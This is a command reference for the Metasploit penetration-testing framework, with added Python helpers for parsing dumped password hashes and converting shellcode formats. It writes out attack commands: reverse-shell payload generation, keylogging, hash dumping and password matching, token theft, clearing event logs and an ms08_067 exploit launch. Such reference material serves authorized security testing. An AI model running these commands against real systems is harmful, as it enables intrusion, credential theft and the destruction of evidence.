Metasploit is an open-source vulnerability exploitation and validation framework that helps security and IT professionals identify security issues, verify that mitigations actually work, and manage expert-driven security assessments to produce real security risk intelligence. Its features include smart exploitation, password auditing, web application scanning, and social engineering. Teams work together inside Metasploit and consolidate their findings into reports.
The following describes its commands and usage parameters. Module names, options and Meterpreter commands are case-sensitive as written here.
show exploits
Lists all exploit modules in the Metasploit framework.
show payloads
Lists all payloads in the Metasploit framework.
show auxiliary
Lists all auxiliary modules (scanners, fuzzers, sniffers and similar helpers; these are not payloads) in the Metasploit framework.
search name
Searches the exploit and other modules in the Metasploit framework by name.
info
Displays information about a specific exploit or module.
use name
Loads an exploit or module.
LHOST
The local (attacker) host IP address that the target connects back to. When the target is not on the same LAN this usually has to be a public or otherwise reachable address; it matters most for reverse (connect-back) shells.
RHOST
The remote host, i.e. the target.
set option value
Sets a specific configuration parameter (e.g. the local or remote host) for the currently loaded module.
setg option value
Sets a specific configuration parameter globally, so it applies to every module loaded afterwards.
show options
Lists all configuration parameters of the current exploit or module.
show targets
Lists all target platforms supported by the exploit.
set TARGET num
Specifies the operating system and patch level of the target, if you know it.
set PAYLOAD name
Specifies the payload to use.
show advanced
Lists all advanced configuration options.
set AutoRunScript migrate -f
After exploitation completes, automatically migrates the session into a freshly spawned process (-f), so the session survives if the exploited process crashes or is closed.
check
Tests whether the target is vulnerable to the selected exploit without actually exploiting it (not every module implements a check).
exploit
Runs the exploit or module against the target.
exploit -j
Runs the exploit as a background job.
exploit -z
Runs the exploit but does not interact with the session once it is established.
exploit -e encoder
Specifies the payload encoder to use (e.g. exploit -e x86/shikata_ga_nai).
exploit -h
Lists the help information for the exploit command.
sessions -l
Lists the available interactive sessions (useful when handling multiple shells).
sessions -l -v
Lists all available sessions with details, e.g. which vulnerability was used to compromise each system.
sessions -s script
Runs a specific Metasploit script on all active sessions.
sessions -k id
Kills the given session (sessions -K kills all active sessions).
sessions -c cmd
Executes a command on all active sessions.
sessions -u sessionID
Upgrades a plain Win32 command shell to a Meterpreter session.
The database commands below are from older Metasploit releases: db_create, db_destroy and db_autopwn were removed from the framework long ago (db_autopwn in 2011). Current versions connect to PostgreSQL with db_connect or db_status and import scans with db_nmap, and the role of db_autopwn is taken by running scanner and exploit modules explicitly. The legacy syntax is kept here as it appeared.
db_create name
Creates a database (e.g. db_create autopwn) for database-driven attacks.
db_connect name
Creates and connects to a database (e.g. db_connect user:password@host/dbname) for database-driven attacks.
db_nmap
Runs Nmap and stores the scan results in the database (common Nmap options are supported, e.g. db_nmap -sT -v -P0 target; -P0 is the old spelling of -Pn).
db_autopwn -h
Displays the help information for the db_autopwn command.
db_autopwn -p -r -e
Runs db_autopwn against every discovered open port (-p), launches exploits against all matching systems (-e) and uses a reverse shell (-r).
db_destroy
Deletes the current database.
db_destroy user:password@host:port/database
Deletes the database identified by the full connection string.
Meterpreter Commands * * *
help
Opens the Meterpreter help.
run scriptname
Runs a Meterpreter script; all script names can be seen in the scripts/meterpreter directory.
sysinfo
Lists system information about the compromised host.
ls
Lists files and folders on the target host.
use priv
Loads the privilege-escalation extension (priv); recent versions load it automatically.
ps
Displays all running processes and the user accounts they run as.
migrate PID
Migrates into the given process ID (obtain PIDs with the ps command).
use incognito
Loads the incognito extension (used to steal tokens from, or impersonate users on, the target host).
list_tokens -u
Lists the available tokens by user.
list_tokens -g
Lists the available tokens by group.
impersonate_token DOMAIN\\username
Impersonates a token that is available on the target host (the backslash is doubled on the Meterpreter command line).
steal_token PID
Steals the token of the given process and impersonates it.
drop_token
Stops impersonating the current token.
getsystem
Tries several local techniques (named-pipe impersonation, token duplication) to elevate to NT AUTHORITY\SYSTEM; it normally needs an already-elevated (administrator) session to succeed.
execute -f cmd.exe -i
Executes cmd.exe and interacts with it.
execute -f cmd.exe -i -t
Executes cmd.exe with the currently impersonated token (-t), so the shell runs as the impersonated user; add -H to hide the window.
rev2self
Reverts to the original user context the session started with.
reg command
Interacts with the target's registry: create, delete and query keys and values, and so on.
setdesktop number
Switches to another desktop (only works for users who are logged on).
screenshot
Takes a screenshot of the target host's screen.
upload file
Uploads a file to the target host.
download file
Downloads a file from the target host.
keyscan_start
Starts the keylogger on the remote target host.
keyscan_dump
Dumps the keystrokes captured so far on the target host.
keyscan_stop
Stops the keylogger on the target host.
getprivs
Enables as many privileges as possible on the current token.
uictl enable keyboard/mouse
Takes control of (enables or disables) the target host's keyboard and mouse.
background
Backgrounds the current Meterpreter session and returns to the msfconsole prompt.
hashdump
Dumps the password hashes (SAM database) from the target host, one user:rid:lmhash:nthash::: line per account.
use sniffer
Loads the sniffer extension.
sniffer_interfaces
Lists the target host's network interfaces (not ports).
sniffer_dump interfaceID pcapname
Retrieves the packets captured on the given interface and writes them to a pcap file.
sniffer_start interfaceID packet-buffer
Starts capturing on the given interface with the given packet buffer size.
sniffer_stats interfaceID
Shows capture statistics for the interface being sniffed.
sniffer_stop interfaceID
Stops capturing.
add_user username password -h IP
Adds a user on the remote target host.
clearev
Clears the event logs on the target host.
timestomp
Modifies file MACE attributes, e.g. the creation time of a file (anti-forensics).
reboot
Restarts the target host.
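The hashdump output described above is only useful once you parse it. The following Python is an added example, not code from the original page or from Metasploit: it parses constructed hashdump lines, flags accounts that still store an LM hash or have an empty password, and verifies candidate passwords against the NT hash (MD4 of the UTF-16LE password). MD4 is implemented inline because hashlib's md4 is often unavailable on OpenSSL 3 systems; the sample lines and the candidate list are constructed for the example.

```python
import struct

MASK32 = 0xFFFFFFFF


def _rotl(v, n):
    return ((v << n) | (v >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), used here because hashlib.new('md4')
    is frequently missing on systems built against OpenSSL 3."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    # (round function, additive constant, per-step shifts, message word order)
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19),
         list(range(16))),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        words = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, const, shifts, order in rounds:
            for i, k in enumerate(order):
                t = (a + func(b, c, d) + words[k] + const) & MASK32
                # rotate the working variables so every step updates "a"
                a, b, c, d = d, _rotl(t, shifts[i % 4]), b, c
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE encoding of the password."""
    return md4(password.encode("utf-16-le")).hex()


# LM field hashdump emits when no LM hash is stored, and the NT hash of "".
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = md4(b"").hex()


def parse_hashdump(text: str) -> list:
    """Parse user:rid:lmhash:nthash::: lines into dicts with risk flags."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # skip blank or malformed lines
        lm, nt = parts[2].lower(), parts[3].lower()
        entries.append({
            "user": parts[0],
            "rid": int(parts[1]),
            "lm": lm,
            "nt": nt,
            "lm_stored": lm != EMPTY_LM,     # LM hashes are trivially crackable
            "empty_password": nt == EMPTY_NT,
        })
    return entries


def check_candidates(entries: list, candidates: list) -> dict:
    """Return {user: password} for every entry whose NT hash matches a candidate."""
    table = {nt_hash(p): p for p in candidates}
    return {e["user"]: table[e["nt"]] for e in entries if e["nt"] in table}


# Constructed sample resembling hashdump output (not a real dump).
SAMPLE_HASHDUMP = """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
legacy:1002:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
"""

if __name__ == "__main__":
    for e in parse_hashdump(SAMPLE_HASHDUMP):
        flags = [f for f in ("lm_stored", "empty_password") if e[f]]
        print(e["user"], e["rid"], ",".join(flags) or "-")
    print(check_candidates(parse_hashdump(SAMPLE_HASHDUMP), ["letmein", "password"]))
```

Accounts whose LM field is not the empty-LM constant are the first to attack (LM is case-insensitive DES over 7-byte halves), and an NT hash equal to MD4("") means the account has no password at all; both are worth reporting even if no candidate matches.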
msfpayload Commands * * *
msfpayload, msfencode and msfcli were removed from Metasploit in 2015 and replaced by msfvenom, which merges payload generation and encoding into one tool (e.g. msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port -f exe -o payload.exe). The old syntax is kept here as it appeared on the original page.
msfpayload -h
Lists the help information for msfpayload.
msfpayload windows/meterpreter/bind_tcp O
Lists the configuration options of the windows/meterpreter/bind_tcp payload (works for any payload).
msfpayload windows/meterpreter/reverse_tcp LHOST=ip LPORT=port X > payload.exe
Creates a reverse_tcp Meterpreter payload that connects back to ip:port and saves it as a Windows executable named payload.exe.
msfpayload windows/meterpreter/reverse_tcp LHOST=ip LPORT=port R > payload.raw
Creates the same reverse_tcp payload and saves it in raw format as payload.raw, for later processing with msfencode.
msfpayload windows/meterpreter/reverse_tcp LPORT=port C > payload.c
Creates a reverse_tcp payload and exports the shellcode as a C array.
msfpayload windows/meterpreter/reverse_tcp LPORT=port J > payload.java
Creates a reverse_tcp payload and exports it as a JavaScript string in %u (unescape) encoding.
msfencode Commands * * *
msfencode -h
Lists the help information for msfencode.
msfencode -l
Lists all available encoders.
msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop_vbs, asp, war, macho)
Sets the output format of the encoded buffer.
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
Encodes payload.raw 5 times with the shikata_ga_nai encoder and writes the result as encoded_payload.exe.
msfpayload windows/meterpreter/bind_tcp LPORT=port R | msfencode -e x86/countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
Creates a payload that is encoded with several nested encoders (countdown first, then shikata_ga_nai).
msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c
Creates pure alphanumeric shellcode that assumes the ESI register already points at the shellcode (so no non-alphanumeric GetPC stub is needed) and outputs it in C format.
Note that encoders exist to avoid bad characters (null bytes, newlines, and so on) in the payload and to satisfy constraints such as alphanumeric-only input; they are not an antivirus evasion technique, and stacking iterations rarely helps against modern detection.
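The C, R and J output formats above, and the checks one runs on msfencode output, are easy to get wrong by hand. The following Python is an added example, not code from the original page or from Metasploit: it converts raw shellcode bytes to the C-array and %u JavaScript forms that msfpayload's C and J options produce, parses them back, and implements the two checks a practitioner runs on an encoded buffer (bad-character scan and alphanumeric-only check for alpha_mixed output). The sample bytes are a constructed x86 fragment (xor eax,eax; push eax; push "//sh"; push "/bin"); padding odd-length input with 0x41 for the %u form is an assumption of this example.

```python
import re

# Constructed sample: xor eax,eax ; push eax ; push 0x68732f2f ; push 0x6e69622f (13 bytes, odd on purpose)
SAMPLE = bytes.fromhex("31c050682f2f7368682f62696e")


def to_c_array(buf: bytes, name: str = "buf", width: int = 16) -> str:
    """Render shellcode as an unsigned char array of \\xNN escapes, like msfpayload's C output."""
    lines = []
    for i in range(0, len(buf), width):
        lines.append('"' + "".join("\\x%02x" % b for b in buf[i:i + width]) + '"')
    return "unsigned char %s[] =\n%s;\n" % (name, "\n".join(lines))


def from_c_array(text: str) -> bytes:
    """Parse \\xNN escapes back into bytes (what the compiler puts in the array)."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def to_js_unescape(buf: bytes, pad: int = 0x41) -> str:
    """Render as %uXXXX units for JavaScript unescape(): each unit is a 16-bit
    little-endian word, so bytes b0 b1 become %u<b1><b0>. Odd-length input is
    padded with one byte (0x41 = inc ecx on x86) in this example; an assumption."""
    if len(buf) % 2:
        buf = buf + bytes([pad])
    return "".join("%%u%02x%02x" % (buf[i + 1], buf[i]) for i in range(0, len(buf), 2))


def from_js_unescape(text: str) -> bytes:
    """Undo %u encoding: swap each 4-hex-digit unit back to little-endian byte order."""
    out = bytearray()
    for unit in re.findall(r"%u([0-9a-fA-F]{4})", text):
        out += bytes([int(unit[2:], 16), int(unit[:2], 16)])
    return bytes(out)


def bad_char_offsets(buf: bytes, bad: bytes = b"\x00") -> list:
    """Offsets of bytes the target will not accept; encoders exist to make this list empty."""
    return [i for i, b in enumerate(buf) if b in bad]


def is_alphanumeric(buf: bytes) -> bool:
    """What an alpha_mixed buffer must satisfy (ASCII letters and digits only)."""
    return buf.isalnum()


if __name__ == "__main__":
    print(to_c_array(SAMPLE))
    print(to_js_unescape(SAMPLE))
    print("bad chars at", bad_char_offsets(SAMPLE, b"\x00\x0a\x0d"))
    print("alphanumeric:", is_alphanumeric(SAMPLE))
```

Run the bad-character scan on the msfencode -t raw output, not on the C text; and remember that a pure alphanumeric check only holds for the whole buffer when BufferRegister is set, because otherwise the encoder prepends a non-alphanumeric GetPC stub.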
msfcli Commands * * *
msfcli was removed from Metasploit in 2015; the equivalent today is msfconsole -x "use exploit/...; set ...; run" or a resource script run with msfconsole -r file.rc. The old syntax is kept here as it appeared.
msfcli | grep exploit
Lists only the exploit modules.
msfcli | grep exploit/windows
Lists only the Windows exploit modules.
msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=port RHOST=ip E
Launches the ms08_067_netapi exploit against ip with the bind_tcp payload, which listens on the given port on the target (E = execute).